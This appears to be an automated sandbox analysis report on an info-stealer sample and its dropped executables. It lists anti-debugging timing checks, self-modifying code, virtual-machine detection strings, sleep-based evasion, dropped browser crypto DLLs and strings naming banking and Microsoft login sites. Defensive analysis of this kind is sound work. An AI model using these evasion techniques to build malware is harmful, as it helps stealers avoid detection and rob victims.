0x0000004d push edx 0x0000004e push esi 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 762FE4 second address: 762FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 762FE8 second address: 763009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F1D94F8162Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1D94F8162Bh 0x00000015 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 764121 second address: 76414F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F1D94C8C5C7h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F1D94C8C5BCh 0x00000016 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 76414F second address: 764155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 764C18 second address: 764C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 765682 second address: 765688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 765688 second address: 76568C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 766213 second address: 766221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1D94F81626h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 766221 second address: 76622C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 771152 second address: 771158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 771158 second address: 77115C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 764900 second address: 764904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7742B2 second address: 7742B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7742B6 second address: 7742E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94F81639h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F1D94F81626h 0x00000017 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7742E1 second address: 7742FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7742FB second address: 774359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1D94F8162Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F1D94F81636h 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+12479EC3h], ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F1D94F81628h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 push eax 0x00000038 pushad 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 775409 second address: 775457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1D94C8C5B8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, 2C6DBDA3h 0x00000029 mov dword ptr [ebp+122D21FFh], edx 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D2BF9h] 0x00000037 push 00000000h 0x00000039 mov ebx, 4E961E5Dh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 jnp 00007F1D94C8C5B6h 0x00000048 pop eax 0x00000049 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 775457 second address: 77545E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 77756B second address: 777581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 777581 second address: 777586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 777586 second address: 77760C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1D94C8C5B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F1D94C8C5B8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, 7AF135ADh 0x0000002a mov bx, ax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F1D94C8C5B8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 cld 0x0000004a push 00000000h 0x0000004c pushad 0x0000004d pushad 0x0000004e sub eax, dword ptr [ebp+122D267Ah] 0x00000054 jl 00007F1D94C8C5B6h 0x0000005a popad 0x0000005b popad 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push eax 0x0000005f ja 00007F1D94C8C5B6h 0x00000065 pop eax 0x00000066 pop eax 0x00000067 push eax 0x00000068 jp 00007F1D94C8C5C2h 0x0000006e jnc 00007F1D94C8C5BCh 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7785F0 second address: 77865C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1D94F81635h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F1D94F81628h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+12471EC8h], ecx 0x00000030 push 00000000h 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 jc 00007F1D94F8163Dh 0x0000003b jmp 00007F1D94F81637h 0x00000040 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 77965D second address: 779662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 765F73 second address: 765F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 765F78 second address: 765F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F1D94C8C5B6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 765F8C second address: 765F96 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 77B67B second address: 77B696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 77B696 second address: 77B69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7653BD second address: 7653D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94C8C5C7h 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 766A0E second address: 766A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 120FAB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 120FBAF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13C870E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 14517B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Special instruction interceptor: First address: 5AEE4C instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Special instruction interceptor: First address: 7E47ED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 2AEE4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4E47ED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Special instruction interceptor: First address: 1D3915 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Special instruction interceptor: First address: 39CC55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Special instruction interceptor: First address: 1D390F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Special instruction interceptor: First address: 407A62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Special instruction interceptor: First address: 587B1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Special instruction interceptor: First address: 587A6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Special instruction interceptor: First address: 7C587D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Special instruction interceptor: First address: 73573F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Special instruction interceptor: First address: E2FAB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Special instruction interceptor: First address: E2FBAF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Special instruction interceptor: First address: FE870E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Special instruction interceptor: First address: 10717B5 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Memory allocated: 5210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Memory allocated: 5350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Memory allocated: 7350000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Documents\AAAAECGHCB.exe

Code function: 20_2_04DA0CC8 rdtsc

20_2_04DA0CC8

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window / User API: threadDelayed 6159
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window / User API: threadDelayed 3626

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 6084	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6084	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5504	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5364	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5788	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5788	Thread sleep time: -80040s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6064	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6064	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6780	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6780	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6948	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2908	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3084	Thread sleep count: 153 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3084	Thread sleep time: -4590000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1748	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5532	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3084	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe TID: 7360	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe TID: 7360	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe TID: 7584	Thread sleep count: 6159 > 30
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe TID: 7584	Thread sleep count: 3626 > 30
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe TID: 5940	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe TID: 5940	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\AAAAECGHCB.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CE7EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CE7EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000016.00000002.1908863789.0000000000435000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000019.00000002.2507323193.0000000000435000.00000040.00000001.01000000.0000000E.sdmp, qk4EiZw.exe, 0000001B.00000002.2504418022.0000000000353000.00000040.00000001.01000000.0000000F.sdmp, 9faf801df7.exe, 0000001C.00000002.2342834166.0000000000713000.00000040.00000001.01000000.00000011.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2479056374.0000000000FC9000.00000040.00000001.01000000.00000013.sdmp, 9faf801df7.exe, 00000020.00000002.2504710537.0000000000713000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware2h
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: JJJJEBGD.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: JJJJEBGD.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: JJJJEBGD.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: JJJJEBGD.0.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, 00000000.00000002.1867859972.0000000001647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.0000000001068000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000019.00000002.2513354623.000000000109B000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343522276.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342620516.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343796739.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342563019.0000000000F73000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.000000000163F000.00000004.00000020.00020000.00000000.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2480751384.0000000001612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: JJJJEBGD.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: e0da62c8af.exe, 0000001F.00000002.2507748021.0000000000C48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: JJJJEBGD.0.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: qk4EiZw.exe, 0000001B.00000002.2509170115.00000000012F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: file.exe, 00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: MSHN6QKQEMU
Source: JJJJEBGD.0.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: JJJJEBGD.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: JJJJEBGD.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: JJJJEBGD.0.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: JJJJEBGD.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: JJJJEBGD.0.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 0fb4fa91ba.exe, 0000001D.00000002.2480751384.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JJJJEBGD.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: JJJJEBGD.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 9faf801df7.exe, 0000001C.00000003.2342620516.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000002.2343796739.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342216529.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, 9faf801df7.exe, 0000001C.00000003.2342563019.0000000000F73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: JJJJEBGD.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
